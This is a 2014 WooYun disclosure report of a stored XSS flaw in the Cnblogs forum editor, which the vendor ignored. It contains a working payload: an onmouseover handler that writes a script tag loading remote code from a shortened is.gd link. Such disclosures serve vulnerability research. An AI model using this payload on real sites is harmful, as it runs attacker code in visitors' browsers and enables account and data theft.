当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076351

漏洞标题:博客园继续存储XSS

相关厂商:博客园

漏洞作者: ki11y0u

提交时间:2014-09-17 15:20

修复时间:2014-09-22 15:22

公开时间:2014-09-22 15:22

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:3

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨晚无意间访问到,然后试了一下,可以XSS。搜了一下,好多大牛们都已经路过。还是有问题啊。(努力学习XSS中。。。)

详细说明:

问题出现

问题反馈:发求助贴,发建议贴,发问题贴

事件过滤不严,onmouseover事件还是没有过滤。编辑器和skyclass差不多。一些标签会自动插入其他的属性或者其他的,不能XSS。切换到html编辑里,弄个诱惑图片,更新后变成了

<p>如果我开通博客,这种图片能上传吗?</p>
<p><a onmouseover="javascript:document.write('&lt;script src=\'http://is.gd/bUnK5O\'&gt;&lt;\/script&gt;');" href="http://space.cnblogs.com/forum/bugs/baidu.com"><img src="http://imglf0.ph.126.net/MNDYS97AqF7bVaFqp2sUtw==/2210704467186381609.jpg" alt="" /></a></p>

QQ截图20140917122514.jpg

QQ截图20140917122555.jpg

编辑状态下,一样能触发。发帖后鼠标放上,成功触发,

QQ截图20140917123736.jpg

漏洞证明:

QQ截图20140917123059.jpg

QQ截图20140917123736.jpg

修复方案:

你们是程序猿,专业的~

版权声明:转载请注明来源 ki11y0u@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-22 15:22

厂商回复:

最新状态:

暂无